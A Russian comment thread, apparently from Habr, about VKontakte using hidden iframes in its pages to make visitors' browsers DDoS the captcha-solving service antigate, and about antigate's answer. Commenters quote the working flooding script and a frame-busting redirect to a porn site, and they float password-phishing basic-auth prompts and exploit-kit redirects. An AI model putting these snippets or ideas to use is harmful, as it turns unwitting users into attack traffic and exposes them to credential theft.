Как у вас ln(2) получается, вроде как функция расходящаяся? При стремление x->0, sin1/x в любой окрестности принимает как положительные так и отрицательные значения и подкоренного выражения не существует (при этом arctgx слева от нуля отрицателен, а справа положителен). Поправьте если не прав
0
Синус да, у него предела не будет, а вот первая часть как раз в пределе будет ровна 0 => все произведение тоже. Как-то так, если еще не все забыл из курса пределов в матане.
+1
sin() ограничен [-1, +1], arctg() стремится к нулю. Значит, их произведение тоже стремится к нулю.
+1
Это все верно, если нет степень 1/2. Я утверждаю, что предела нет по определению, потому что нет такой проколотой окрестности 0, где выражение sqrt(arctgx + sin(1/x)) было бы всюду определенно, а по определению должно быть всюду.
0
Ну зафиксируйте какую-нибудь ветку корня, всё получится.
+1
Нельзя, мы не можем выбирать из окрестности только подходящие нам точки.
0
Давайте cчитать, что у нас функция из R в C. Да, тут будет не ветка (я уже начал забывать комплан:)). Зафиксируем какое-нибудь значение \sqrt{arctg(1)sin(1)}, далее аналитическое продолжение. Получим спираль, сходящуюся к нулю.
0
Ну так наверное верно, сам комплан уже не помню и тут поспорить не смогу :)
PS: Ну ясно, что авторы имели ввиду R->R, раз используется x.
0
А тогда можно сказать, что предел берется по тому множеству, где функция определена:)
0
Я полагаю, тут неявно стоит предел по множеству — области определения функции под пределом. В таком случае все, очевидно, корректно (т.к рассматривается пересечение окрестности с множеством).
+4
Это, кстати, скриншот реального форума, где было много довольно крутых математиков, а вовсе не шутка. В универе день решали уравнения, чтобы туда попасть.
+5
Реальный? Ужас.
Решить-то задачку просто: там ответ — ln 2.

Но вводить-то что?
ln 2
ln(2)
0,69
0,693
0.69
0.693

А если после неправильного ответа капча меняется… Чтож, я верю, что уравнения решали целый день.
0
Зря надеетесь: меня вот, чтоб зарегаться на известном сайте про Хакинтош, спросили, сколько будет 6536 / 512. Я так и не понял, что надо было ответить, ради интереса дождался этого вопроса ещё раз, пробовал с разной точностью, не получилось.
+5
o_O подходит. Не догадался, что они вторую «5» пропустили. Наверное, я робот.
UFO landed and left these words here
0
Простите, только сейчас заметил, что эта идея была уже опубликована.
+38
Как мило. Antigate помогает распознать каптчу ВК для спама на этом ресурсе. а ВК живет за счет ворованыхчужих фильмах и мп3. если 2 этих ресурса пропадут из сети переживать не стану.
+4
Зашел на сайт, это же сервис по распознаванию капчи китайцами. Все правильно сделал (с)
0
У ВК же капча кириллицей, вряд ли китайцы распознают. Хотя кто еще 1000 капч за один доллар согласится распознавать? Непонятно в общем.
0
А распознающие зомби получают еще меньше. Пусть можно прочитать, распознать, набрать и отправить за 10 секунд. За минуту 6, за час 360, т.е. 1000 капч за 3 часа. Распознающий получит за это меньше доллара. Кто согласится так работать?
Хотя наверняка не все капчи распознаются вручную, а только те, которые не распознал софт, но какая это часть от всех — неизвестно, так что возможно распознающий получит и больше доллара.
+1
Жил в мааааленькой деревушке. Мне было 12 лет. Денег на webmoney положить, не было никакой возможности. Совсем! И вот так. Сидя на диалапе, тратил 15 рублей за час, зарабатывал 3-4 рубля (на аналогичной фигне) в день (Максимум). Многое попробовал в своё время. И это, в то время, когда компьютеры были у избранных, и тем более интернет.
+1
Зэки, например. Те, которые в данный момент не фармят в варкрафте.
+2
Что значит правильно? Пусть себе заказывают трафик чтоб ддосить их, а не меня используют.
+2
Да не очень он живой. Мне очень очень долго отдает 502.
+13
Вконтакте начинает диктовать свои правила. Очень занимательно будет прочитать официальные комменты по этому поводу.
+4
Не менее забавно будет услышать претензии от antigate =)
Они нас задосили всего лишь за то, что мы обеспечивали всех желающим инструментом для спама их системы.

вроде: Я царапал гвоздём машины во дворе, а мне один из владельцев его в :… засунул. Уважаемый судья, разберитесь! Так делать нельзя!

другими словами: мне можно, другим — нельзя. Оба действия вредительны, но параметр в url нам подсказывает, что вконтактик их предупреждал прежде.
-1
Кто antigate и кто vkontakte? Уровни разные, это как сравнить Сомали и США (кстати, удачный пример, непонятно еще кто больше зла делает).
+2
Вы о чём? То есть старушка с гранатой может взять кассу отделения банка, а здоровый мужик нет, в тюрьму его! И где, по-вашему, проходит эта грань, чтобы классифицировать преступление?
0
Вы меня неправильно поняли. Я к тому что много маленьгих компаний, промышляющих не совсем законными методами. С этим ничего не поделать. А вот огромные компании не должны прибегать к грязным методам, они должны быть выше того.
+1
Ещё одно заблуждение приходящее к первому выводу: мне можно, другим — нельзя.

Ну и как-бы: критикуя — предлагай. Я вижу мотивы Дурова, не совсем уверен в законности, но они прозрачны. Альтернативных путей борьбы — не вижу поскольку интернет свободен. ВК явно несёт прямые убытки от услуг антигейта. И судя по сообщению в запросе предупреждал антигейт прежде, так что моська сама виновата, что слон на нёё наступил.
+13
Что-что? какие убытки. Это сервис по распознованию капчи. Вы же в магазине можете топор купить или журнал.

По вашей логике следующим должен быть Adblock — ведь тоже приносит огромные убытки.

На месте antigate — отправлял клиента большим PopUp на Facebook.
0
Фантастическая способность на чёрное говорить белое. Покупая топор предполагается, что вы будете им колоть дрова. Если же вы решите применить его как орудие убиства — вы сядете, пример понятен?

Антигейт по своей природе не подразумевает ничего хорошего. Если вы произнося «сервис разгадывания капчи» не чувствуете негативной составляющей в последующих действиях, то видимо что-то стало с людьми, я огорчён.

Домашнее задание: привести пример как услуги антигейт может быть применён в положительном ключе не нанося никому вреда.
0
Если поисковая система ставит капчу, значит по мнению её создателей должен быть лимит/препятствие на кол-во запросов в единицу времени. Пользуясь системой вы соглашаетесь с этими правилами, а привлекая Антигейт — их нарушаете в своих корыстных целях.
-6
Но задание-то выполнено: вреда никому от парсинга ответов нет.

Пример использования:
На сайте к афоризмам предлагаются картинки (раскрашиваем текст картинками).
Т.е. пользователям сайта польза — доп. вдохновение, интересные картинки и т.п.
Поисковику +-1000 запросов — вообще ни о чём.
+2
Печаль, вы сами установил свою логику и по ней же решил как будет правильно.
-4
Объясните, пожалуйста, в чём я не прав?

p.s. Так «сами» или «установил»?
-1
Минусоиды на хабре всё забавнее и забавнее становятся.
Удачи вам, Господа.
0
Распознавание книг по сканированным изображениям, названий улиц по фото. Не?
+1
То. Но сканы изображений во благие цели. А это… немножко иное.
+1
Ну, вы же понимаете, что каждый из нас использует сервисы именно в том ключе, который считает необходимым для себя.
И если человек занимается спамом, то он будет им заниматься так или иначе, пока его занятие не будет пресечено. Не будет антигейта, он найдет другой способ, вплоть до использования зараженных компьютеров для разгадывания тех же капч — нагружая их системы, вместо мозгов многотысячной орды китайцев, корпящих над разгадыванием капч в антигейте.
0
Вы правы, но деяния прекратятся ровно в тот момент, когда на них реализацию будет уходить больше ресурсов, чем полученная от них прибыль. Хоть это и выглядит как борьба с ветряными мельницами, но война имеет смысл для обоих из сторон так как шансы есть у обоих.
Мне почему-то кажется, что контакт доработав свою «пушку» путём отправки запроса через невидимый flash (чтобы пресекать http авторизации в img src=""), легко добьётся того, что антигейту будет выгоднее добавить ВК в исключения, чем перманентно лежать.
0
Антигейт не будет добавлять ВК в исключения. Не сможет, поскольку никаких опознавательных знаков, различимых программным комплексом их «сервиса», просто нет.
Капчи на сервер антигейта и ему подобных загружаются не по URL с того же ВК, а передачей данных через форму (при автоматизации — зачастую, POST запросом от клиентского софта). Соответственно, исключать такие «распознаватели» могут только отдельных пользователей, но не сайт, капчи которого отдаются им на распознавание.
По поводу же затрат ресурсов я с вами согласен.
0
А вот это уже головная боль антигейта, как фильтровать картинки ВК от неВК иначе лежать ему можно будет вечно.

Кстати, по-поводу законности использования ресурсов посетителей, Дурову достаточно сделать всплывающее сообщение каждому пользователю с объяснением ситуации вроде «Дав согласие вы поможете себе и нам очистить ВК от спама» и набрать нужно кол-во для бот-нета.
+3
И вскоре появится новый заголовок на хабре: «ООО ВКонтакте организовало первый законный ботнет» :) Что же, ждем
0
Думаю, дешевле будет распознать целый скан, чем разрезать его на куски и платить за них отдельно.
+1
Это не капча. Безусловно возможно такое применение. Я думаю, вы согласитесь, что никто слова бы против антигейта не сказал если бы он распознавал номера домов для каких-нибудь карт, но мы с вами понимаем, что за всю свою жизнь текущую и будущую таким он вряд ли будет заниматься.
0
Вижу единственный пример: Помогать РеКапче распознавать литературу.
т.е. пожервовать какое-то количество денег на распознавание «китайцами» отсканированой литературы.
Ну или предложить помогать облачному ABBYY :)
0
Неее… На распознавание книг нужно спонсирование. А кому оно нужно? Наверно только гуглу. Без фин. прибыли, это пустая затея. Согласных не будет.
+4
Если же вы решите применить его как орудие убиства — вы сядете, пример понятен?

Если же вы решите применить его для рассылки спама — вы сядете, пример понятен?

Разницу ощущаете?

Антигейт по своей природе не подразумевает ничего хорошего.

Ну так какое ваше дело — хороший он или плохой. Общество живет по законам которые само и формирует и данный сервис законен.

+4
Antigate только потенциально может использоваться для нарушения закона. А вот логичный вопрос о законности уже совершенных действий VK останется без ответа. Но факт остается фактом. Меня никто не предупреждал, что я поучаствую в DDoS атаке другого сервиса!
+3
Если же вы решите применить его как орудие убиства — вы сядете

Вот именно. Сядет убийца, а не тот, кто произвел или продал орудие.

Если вы произнося «сервис разгадывания капчи» не чувствуете негативной составляющей в последующих действиях…

А если вы, произнося «автомат Калашникова», чувствуете негативную составляющую в последующих действиях…, то кого будем наказывать?
+4
И судя по сообщению в запросе предупреждал антигейт прежде

— вы уже второй раз это повторяете, поэтому я счел нужным обратить внимание на тот факт, что судя по сообщению, никто никого не предупреждал ранее:

http://****.com/in.php?first_and_last_warning=on

Предупредили, направив мощный iframe-трафик. Кстати, вызывает некоторый интерес часть «…and_last…». Очень хотелось бы знать, на какие еще незаконные способы борьбы намекает ВКонтакте. :)
+1
Нет, слон влез в говно, подставив своих пользователей на бог весть какие эксплоиты.
+2
Ждем ответный ход Цукерберга по ддосу вконтакта.
+11
А я так не считаю. Может быть юридически не совсем законный ход со стороны ВКонтакте, но я целиком и полностью на их стороне — против спамеров все средства хороши.
— Что же вы делаете, живому человеку кулаками по лицу колотите.
— Уйди, бабка, мы спамера поймали!
— Так что же вы его руками-то? Ногами надо, ногами!
+5
Знаете, я поклонник классиков типа Достоевского и привык везде видеть честь. Низкие поступки — удел слабых. На сильных должны равняться все остальные, а Вконтакте как отечественный проект я очень уважаю. Я не думаю, что Вконтакт серьезно страдает от потугов одной компании, которая предоставляет услуги взлому капчи. Возможно, это единственный способ борьбы на российском рынке, а возможно, что это решение было принято второпях. Поэтому я и говорю что мне интересны доводы официальных лиц. Хочется верить, что они взвешены.
0
Думаю, ВКонтакте серьезно страдает. Капча в ВК такая что человеку сложно разгадать, а спама полно. Выходит, весь спам проходит как раз через такие сервисы.
+1
>Я не думаю, что Вконтакт серьезно страдает от потугов одной компании, которая предоставляет услуги взлому капчи.
Страдает не только контакт, а ещё и его пользователи от засилья спама.
+1
По-моему вы забыли суть разговора — один сервис распознаёт капчи, а другой сделал ботнет и ддосит с его помощью. Ваши примеры полный «полет фантазии» в сравнении с изначальной ситуацией.
0
Вы правы, утрирование было применено сознательно для демонстрации идиотичности ситуации. Примеры по-прежнему подчиняются правилам логики оппонента, но выдумывать им оправдание гораздо сложнее. В итоге наглядно имеем, что мне (или кому-то иному), а вот им (тем) — нельзя.
0
Видать, все-таки для когото-то ваши примеры черезчур действенные, не ожидал что мне начнут сливать карму за то что я сказал что Вконтакт должен быть выше этого. Вот уж реально для меня был сюрприз.
+3
Про «его в :… засунул». Да, после этого можно обратиться в суд и выиграть его спокойно. Почему бы и нет?
0
В обоих случаях человек понимает последствия, Но факт останется фактом — это эффективно, второй раз взяв в руки гвоздь — ассоциативный ряд из памяти может привести его к отмене намерений. =)
Я же не отрицал неправомерности Дурова. Мне тоже не особо приятно, что моими ресурсами как пользователя решают проблемы всей системы, но предпосылки нам всем очевидны. Он не конкурентов устраняет, а вредителей. Думаю это ВК сделали сознательно и юристы готовы к любым развитиям ситуации.

Плюс опять же повторюсь, мне кажется, что фраза Последнее предупреждение говорит о том, что какого-то рода попытка выйти на контакт и решить проблему была прежде, возможно не одна.

Думаю просто такое детское решение со стороны вк обусловлено тем, что антигейт судом не закроешь.
0
При чем тут приятно, неприятно. Действия контакта — незаконны, это типичный DDOS и проходит по 274 статье УК РФ.
0
«first_and_last_warning» — *первое* и последнее предупреждение.
Так что если смотреть на этот параметр, то получается, что раньше договориться не пробовали:)

А если серьезно — то текущая ситуация ничем принципиально не отличается от того, если бы ВК досил конкурентов.

А действующий таким образом владелец машины сядет по статье «Самоуправство»: www.ukru.ru/code/10/330/index.htm (наказывается ограничением свободы на срок до трех лет, либо арестом на срок до шести месяцев, либо лишением свободы на срок до пяти лет). И это абсолютно правильно.
+9
чисто формально, противоправные действия человека/организации, не позволют кому-либо совершать не менее противоправные действия в отношении этого человека.
+3
>Я царапал гвоздём машины во дворе, а мне один из владельцев его в :… засунул. Уважаемый судья, разберитесь! Так делать нельзя!

Ну вообще-то да, так делать нельзя. Право на определение вины и вынесения наказания имеет только суд.
+2
Первого (кто царапал машины) в суде осудят за хулиганство с мелким вердительством собственности (не знаю точной формулировки), а вот второй получит за нанесения вреда здоровью, т.е. огребёт гораздо сильнее. Противодействие должно быть адекватно действию.

Кстати! Статья за ДДОС атаку вроде бы собирались ввести? Никто не в курсе, как с этим обстоят дела?
+2
По поводу статьи не в курсе. Но даже ДДОС можно использовать во благие цели. Если бы мой сайт спамили, я бы тоже использовал все возможные методы борьбы с этим. Только смотря насколько метод борьбы эффективен. А не законен. Законами искоренить спам не возможно, да и не только спам. Я не говорю о том, что законы надо нарушать во благо цели, всему есть предел. Но бороться, за чистоту, своего имени, и своего сервиса нужно.
UFO landed and left these words here
+34
Теперь antigate может поставить HTTP auth и развлекать пользователей вконтакте.
0
Интересно, учитывался ли такой риск. Или как обычно — на авось?… :)
0
Или редирект на https с простроченным сертификатом — тоже весело.
+18
Прикольно. Если бы не вконтакт — я бы про антигейт и не знал. Молодцы, хорошую рекламу сделали.
+22
Те, кто нуждался в подобных сервисах, не могли о нём не знать. А, кто узнал впервые — не имеют в нём нужды как и прежде.
UFO landed and left these words here
0
Как ни странно, такому сервису можно придумать и легальное (!) применение.

Пример: сделал автоматический (через API контакта) пост новостей в свою (!) группу вконтакте с админки. Раз в X десятков новостей в день (ресурс посещаемый) появляется капча. Вводить даже пару-тройку раз в день лень > подрубаем какой нить антигэйт. Круто же. Расходов на копейки, удобства на рубль.
0
а точно пользовательское соглашение ВК точно, позволяет автоматический пост новостей?
+8
*если кто видит в предложении запятую, которой там нет — то это грязь на мониторе, да-да.
0
А какой из двух «точно» является грязью? А то не знаю, где протереть )
0
три по всей поверхности! Чистота монитора еще никому не вредила!
что-то после перехода на убунту начались какие-то пляски с буфером обмена — постоянно что-то куда-то вставляю. Ну или спать больше нужно(
+30
Простодушное замечание «Чтобы избежать Хабраэффекта, ссылка убрана» в контексте статьи, поднимает настроение на целый день.
-45
Удалил свой профиль с вконтакта ибо не видел смысл в присутствии там, а с такими новостями особенно.
UFO landed and left these words here
+9
какой ужас, не видать теперь Дурову IPO на NASDAQ. Срочно возвращайтесь.
-1
Зарегистрировался заново чтобы помочь в священной борьбе со спамерами.
+4
[utopia] Возможно, что цель, которую приследует вконтакте благая, но методы достижения — отвратительны. На все есть закон. Поступать нужно по закону (даже если работает он не так, как нужно). Самосуд ведет к хаосу. Единственно верный способ борьбы — участвовать в развитии закона, тем более что масштабы вконтакте вполне себе это позволяют. [/utopia]
+1
развитие закона? на антигейт? бгг)) Буква закона есть на всё. Но только не на сеть. Закроешь одно. Завтра появится другое.
+15
Теперь они сломали ВКонтакте — перенаправляют на порно сайт.
+3
Они в ответ сломали перенаправлялку, интересно что же будет дальше, чьерт я уже побил свой годовой рекорд по присутствию в вконтакте :)
UFO landed and left these words here
+1
Я даже браузер перезапустил и в сорцы уже полез, думал глюк самого браузера.
+16
Я закрывал этот сайт пол часа назад. — подумал Штирлиц.
+2
Способствует распространению спама на их страницах.
+2
omg, по ходу те ответный ход сделали, при заходе вконаткте на порно перекидывает)
+35
Сейчас antigate отдает ВК такой код:

<script>parent.document.location.href = 'http://xvideos.com/'; parent.document.location = 'http://xvideos.com/';  top.document.location = 'http://xvideos.com/';</script>
+2
Вы немного опоздали, да и пишут, что только с Оперы перебрасывало.
0
Нечаянно отправил вместо перевода строки, выше уже написали что вконтактик на клубничку подсадили :)
+1
АнтиГейт ответил изумительно — по запросу пересылает на порно-сайт.
Приём работает только в Опере.
UFO landed and left these words here
+3
зачем через iframe ддосить? хватило бы тега img или new Image =)))
+29
так antigate не смог бы редиректить пользователей ВК на порнуху
+9
Кстати antigate поступил крайне справедливо и с юмором.
Могли и базу пользователей с паролями получить.
0
согласен, думаю antigate только выиграет, приток новых работников обеспечен =)
+19
Да еще теперь и полхабра знает где можно распознать капчу недорого )
0
После прочтения поста у меня появился точно такой же вопрос. Поставил бы плюс если бы карма была.
+16
М-да… Обжегся вконтакте по полной, похоже, и наверняка будет кто-то наказан за это. Опасно такие фокусы с iframe делать — у атакуемого масса возможностей напакостить в ответ, начиная с редиректов и оканчивая выводом окна http basic auth (и получения через него реальных паролей пользователей) или бесконечных alert-ов. Надо было через img делать (хотя и img подвержен basic auth во многих браузерах). Кто с мечом пришел — от него и погиб.
0
или бесконечных alert-ов

Так вроде браузеры такой бедой уже не страдают. Я во всяком случае в этом уверен.
Можно пример страницы с бесконечными алертами, от которых не поможет отбиться последний FF/Chrome/Opera?
UFO landed and left these words here
+3
Надо бы не iframe, а скрытую картинку <img src="..."> делать на удалённый домен, можно даже с тем же адресом. Тогда возможность выполнить JS в браузере отпадёт. (:
+1
картинка закешируется у клиентов. Так что отаке будет одноразовой для кажого из элементов ботнета.
+1
Достаточно добавить к урлу что-то типа «image.jpg?rand=$rnd», где rnd — что-то типа int(rand(100000000))
0
редирект на https с недействительным сертификатом лечит и от этого.
0
А тут что-то неизлечимое вообще сложно придумать.
Да и сама ситуация… Детский сад, штаны на лямках.
+1
Дайте поглазеть на xvideos.com когда в адресной вконтакте прописан! Ну дайте)
+5
В адресной строке не будет в этом случае вконтакте прописан. Это же обычный top.location=…
+2
Вот спасибо. Теперь есть информационный повод закрыть вконтакт всей организации.
UFO landed and left these words here
+11
Пускай вконтакте ддосят кого хотят — им отвечать перед законом. Но пусть делают это со своих серверов, а не сделав из меня часть ботнета и расходуя мой трафик.
+3
Antigate могли бы вместо редиректа на порнуху сделать редирект на связку blackhole, тогда бы вообще была веселуха и вконтакте можно было бы впаять распространение зловреда.
+25
Как же это местечково, провинциально. Трудно представить, чтобы ФБ такое провернул. Конечно, ведь его бы засудили, пришлось бы кучу денег недовольным пользователям раздать, репутация опять же. А у нас государства в привычном смысле этого слова нету: делай, что хочешь, «мой сайт — мои правила».

Разрегиться бы по-хорошему из контактика, да куча знакомых там: жаль терять связи.

Написать бы в прокуратуру, да толку нету: набегался уже в свое время, начитался отписок.

Выходит, прописано нам в меню кушать кактус :) Приятного аппетита, друзья!
-1
Мне, например, никуда писать не надо потому что я не пострадал. И вообще, пока была вся эта свистопляска я работал и всё пропустил.
Ну вы то пострадали. Чего же ждёте?
+7
Интересно, чем эта ситуация закончится и что в свое оправдание будет говорить Вконтакте.

Сложно представить, чтобы тот же facebook мог себе такое позволить и за это ему ничего не было.
0
а ведь уже в прошлый раз на Премия Рунета на Вконтакте хотела подавать в суд!
то есть это не в первый раз, Вконтакте не боится
+9
Присоединяюсь к негодующим. Если бы меня красивым и ненавязчивым всплывающим окошком попросили поучаствовать в такой акции, я бы даже наверное согласился: не люблю спамеров. Но в тайне от меня расходовать оплаченный из моего кармана траффик, чтобы положить неугодный кому-то сервис — наглость.
+2
Да уж, представьте себе, что Microsoft или Apple разместили бы на сайте редирект на TPB. Но вообще, история обещает быть интересной (popcorn.gif), посмотрим, что будет.
+3
Мдя.
А вот представим, что такую вещь делает гугл. Получаем лежащие магистрали. Хорошо, правда?
0
Я вот что подумал. Антигейт то даёт разработчикам АПИ для внедрения в свои приложения распозавалки капч, и не даёт уже готовый продукт для спама. (Хотя в ЛК есть спец., страничка где можно найти избранные приложения где используется антикапча, и в основном это спам софт). Он предоставляет только сервис. С одной стороны он виноват, что способствует рассылке спама. А с другой, он же не может контролировать каждую капчу, или препятствовать собственному заработку. Вы скажите, он должен контролировать. Но пф. Мало ли, под что делается тот или иной софт, и для чего человеку нужна распознавалка капчи с вконтактика. (Хотя в основном, вся капча используется, либо для чекинга аккаунтов, и последующей продажи, и под рассылку спама). Я хочу сказать, гугл же не виноват, что по слову porno он ищет порно.
0
Здесь уже не важно виноват антигейт или нет, если он виноват, им должны заниматься соответствующие органы.

Давайте каждый, кто будет считать, что другой виноват или не прав будет устраивать свой самосуд.
+7
Сейчас там:
function _test(){var fr=utilsNode.appendChild(ce('iframe')),d=fr.contentWindow.document;d.open();d.write('<script>var XHR=window.XDomainRequest||window.XMLHttpRequest,xhr=new XHR();xhr.open("POST","http://ant'+'iga'+'te.com/i'+'n.php",true);xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");var tmp2="e8532291e45ec27a85e87692e070da98";for(i=0;i<5;++i)tmp2+=tmp2;xhr.send("method=base64&key=fb856f0ab752e3894fbdb3c4613ca924&body="+tmp2+"&ext=jpg");</sc'+'ript>');d.close();setTimeout(re.pbind(fr),1000);}
0
редирект на https c недействительным сертификатом может вылечить
+6
Забавно, что Вконтакте свои функции test называет, может это он новую услугу тестит?
0
Так было бы честнее, если в данном случае вообще об этом может идти речь.
+7
Коммент одного из пользователей roem.ru:
Зачем они на порно перекинули? Как будто в вк его нет?
+11
Я как пользователь хочу подать в суд на ВК за использование меня в качестве боевой единицы в DDoS. Как это правильно сделать?
+2
Лично я против антигейт ничего против не имею. Он меня не трогал. То что вконтактик начал войну некомильфо. В защиту антикапчи: не именно же сервис рассылал спам. А его пользователи. Вконтактик уже проходил такое, когда поднялся шум вокруг него и его пользователей которые заливали на соц. сеть музяку и видюшки. И что, в конце концов? Он сказал. Хм. А мы не приделах, нужен козъёль? Обратитесь к этому пользователю, и отстаньте. Не мешайте греть пушистый мех.
-5
С какого перепугу вы решили что у вас есть основания подавать на них в суд? Это их сайт, а не ваш, и они могут вешать на своем сайте какие угодно картинки, скрипты и прочее. Не нравится — не посещайте сайт Вконтакте. В таком случае подавайте в суд на половину сайтов в мире, за то что они используют вас в качестве смотровой единицы рекламных баннеров и еще извлекают с этого материальную выгоду без вашего на то дозволения.
+4
Есть одно маленькое «но» — они сделали своих посетителей соучастниками преступления, за которое в УК РФ и статья имеется
+5
Всё относительно. Установка счётчика на сайт при желании можно трактовать как ддос статистики.
К тому же, вы когда-нибудь слышали случаи когда наказывали владельцем компьютеров, входящих в ботнет?
+4
Есть еще несколько маленьких но:

1) С заявлением в органы РФ никто из Китая не обращался, никакой проверки не проводилось и проведено я думаю никогда не будет, соответственно и дела нет.

2) Как вы докажете, что вас использовали? В присутствии адвоката, технического специалиста, представителя провайдера и следователя было зафиксировано получение фрейма в http ответе сайта социальной сети Вконтакте?

3) И уж точно вы будете привлечены не как соучастник, а максимум — как свидетель по делу. Плюс за свое рвение подать в суд на Вконтакте у вас изымут на месяцок компьютер для проведения экспертизы по сути заявления.
0
А теперь представим что антигейт сделал не ридерект открытый на иксвидеос, а сделал незаметный ифрейм у себя на связку эксплоитов. И вот тогда вконтакте бы вызвал заражение компьютера. Кстати, не могу быть уверен что связки нет на xvideos.
0
А вот тут вот скорее антигейт перешёл бы грань закона (считаем, что сейчас он на неё балансирует) — распространение/использование вредоносного ПО.
0
Он мог бы проверять что он во фрейме и только тогда перенаправлять. И написать пользовательское соглашение что его нельзя открывать во фрейме.
+2
Я считаю, что эта акция ни к чему дельному не приведет. Ну, допустим, владельцы антигейт решат, что «дааа… вк лучше не распознавать каптчи». И что? К ним то приходит картинка, отправленная через АПИ со локального спам-клиента. То есть они не могут со стопроцентной вероятностью определить, пришла к ним из ВК пришла картинка или с ресурса, который спамить «можно». Вывод: либо закрываться полностью, либо продолжать работать, как ни в чем не бывало, выжимая прибыль из того, что получается делать и воспринимать ВК, как форс мажор.
0
Вообще могут, у ВКонтакта есть преобладание определенных цветов в капче.
0
+еще размер картинки определённый. Так-то контакт может и еще какие-нибудь критерии своей каптчи сделать — только толку немного будет, потому как остальные сайты будут своей каптчей «косить» под вконтактскую.
+2
Даже хуже, достаточно будет перед отправкой картинки капчи антигейту применить к ней любой безобидный фильтр вроде оттенки серого и изменить размер.
+13
Ох лол.
Чего они пытались этим добиться? Только антигейт пропиарили.
Антигейт не нарушает абсолютно ничего.Он даже капчу не берет напрямую с контакта, да и невозможно это.Берет капчу спам-софт, который ее уже перенаправляет на антигейт.
А со стороны ВК это просто выглядит грязной игрой, очень грязной.
+3
Интересно, комментарии, оправдывающие антигейт в последнее время собирают минусы. Минусаторы, может аргументируете, что неверно в рассуждении навроде
Антигейт не нарушает абсолютно ничего.Он даже капчу не берет напрямую с контакта, да и невозможно это.Берет капчу спам-софт, который ее уже перенаправляет на антигейт.

, а то интересно очень?
UFO landed and left these words here
+3
Некорректное сравнение. Человек, продавший банде рации, ломик, ножовку по металлу, не сядет вместе с ними, т.к. он предоставил вполне легальный инструмент и не нарушил закон. Так и они, предоставили вполне легальный инструмент, в котором нет ничего противозаконного.
UFO landed and left these words here
0
Сядет за что? Обоснуйте?
Если я скажу что продаю ножовки, которые вскрывают любой сейф меня посадят?
А если скажу что на моей машине лучше всего уходить от преследования при ограблении банков?
Где состав преступления здесь? :)
UFO landed and left these words here
+1
В том то и дело что антигейт продаёт не «ножовки», а «устройства предназначенные для обхода защиты сейфов».
UFO landed and left these words here
0
Они продают устройства, которыми «также можно и обойти защиту». Т.е. легально/нелегально может быть только использование инструмента, сам сервис ничего противозаконного не делает. Как и в случае ножовок, их возможно как и легально применять так и не легально.
UFO landed and left these words here
-1
Основная и единственная специализация нашего сервиса — автоматическое получение текста с картинок CAPTCHA.

Они не просто с картинок получают текст, а именно с картинок CAPTCHA, т.е. помогают обойти защиту от спама.
Где тут речь о какой-то легальности?
0
Я не юрист… и в законах не силён, в данном случае термин «легальность/нелегальность» был из ответа vyacheslav_ka и имел смысл того, что можно использовать инструмент «по назначению», а можно «для плохих целей», так вот взлом капчи — это и есть «для плохих целей», а занимаются они (судя по описанию на сайте) исключительно этим.
0
Если у вас купят машину, уйдут от преследования, потом их поймают и они скажут, что купили именно у вас, именно потому что вы обещали что покупатели будут уходить от преследования, то вполне могут посадить. С ножовкой сложнее, сейф можно вскрывать и легально (свой, по просьбе хозяина, по решению суда и т. п.), а вот легальное ограбление не представляю, даже по воле хозяина банка.
0
Прочитал так «Если у вас купят машину, уйдут от преследования, потом их поймают и они скажут, что купили именно у вас». Продавца за ложные обещания.
0
Точно не клевета будет, недобросовестная реклама максимум. А продавец ещё может заявить, что специально обманывал, потому что «вор должен сидеть в тюрьме» :)
0
скажите, а про трубки для курения небольших количеств табака вы никогда не слышали? А то у меня тут под боком магазинчик, котоырй торгует как раз такими трубками, а еще художественным стеклом (совершенно определенной формы) и измельчителями для специй. Все это, замечу, назодится в США. Владельцы магазина знают, что торгуют товаром для курящих траву. Полицейские знают. Мэрия знает. Курящие траву знают. Но пока магазин торгует трубками для небольшого количества табака, а не для курения марихуаны, проблем у него не будет.
-1
а если это таксист и он не знает что везет грабителей, тоже сядет?
UFO landed and left these words here
+1
Продавец оружия, скорее всего, догадывается, что его часть его товара будет использована для ограбления банков. Но ответственности он за это не несет.

Операторы site, intitle и inurl в google search используются для поиска незапароленных админок и конфедициальной информации, и гугл об этом знает. Давайте считать гугл соучастником людей, сделавших что-то нехорошее с использованием этих средств?
UFO landed and left these words here
+1
Капча гугла (или чья она там)? С его улицами и фигпойми чем) Ведь всем хорошо. Я вот жду не дождусь когда появятся плагины, для хрома например. Плагин: Распозновалка капч (с привязкой к антигейту или подобному). Чтобы каждый раз голову не ломать.
UFO landed and left these words here
+1
Проект decapcha, который был сделан студентами для распознования сложных кусков отсканированных книг (на сгибе, с дырами на странице и т.д.), который потом купил гугл, и сейчас использует в т.ч. и для распознавания номеров домов на гугл-стрит.

Схема такая же, только вместо платы за распознавание нескольких букв они прикрутили это к сервисам и обязали пользователей выполнять работу по распознаванию текста безвозмездно.

Это показывает что задача распознавания маленьких кусков текста важна и имеет много приложений, не только обход запретов.

А если повнимательней посмотреть на эти запреты, учитывая выше сказанное, то многие из них и не запреты вовсе, а плата действиями за доступ к информации. И что плохого в том, чтобы заплатить десятку людей за выполнение этих рутиных действий (распознание номеров домов и пр.), и тем самым оплатить доступ к информации?
UFO landed and left these words here
0
Этот побочный эффект привел к тому, что тот же гугл стал ставить этот тип капчи повсеместно.

Captcha = Completely Automated Public Turing test to tell Computers and Humans Apart

Распознавание изображения это всего лишь один из тестов этой категории. Взлом системы защиты от спама антигейт не осуществлял. Антигейт только распознает изображения.

Скорее всего в его пользовательском соглашении об этом написано, а так же о том что он возражает и не несет никакой ответственности в случае использования его в преступных целях.
UFO landed and left these words here
0
>> Этот побочный эффект привел к тому, что тот же гугл стал ставить этот тип капчи повсеместно.

> причиной стали спаммеры.

Причиной стала жадность к халяве. Вместо однократного введения капчи или избирательного ее требуют постоянно. И в каждой капче есть часть относящаяся к оцифровке текста. В каждой! Если бы нужна была только защита, то этой части бы не было (т.к. она в плане защиты ничего не дает).

> Да-да, а охранник на воротах тоже только часть системы распознавания свой-чужой. И громила который его вырубил (и получил за это деньги), не хотел грабить банк. Он только вырубил охранника.

Не передергивайте, выше уже привели правильный пример с топорами и ножовками.
UFO landed and left these words here
0
google+, youtube и пр. сервисы где есть социальность и можно что-то комментировать.

> а я уже привел пример, что антигейт не продает вам решение. Он предоставляет сервис. Вы подводите его к замку — он взламывает его для вас. Поэтому его можно сравнить не с продавцом топоров и ножовок, а с медвежатником.

Киоски по изготовлению дубликатов ключей это средство взлома? Вы даете ключ они изготавливают копии.

Вконтакте предоставляет сервис по обмену, копированию, распространению музыки, они пираты?
UFO landed and left these words here
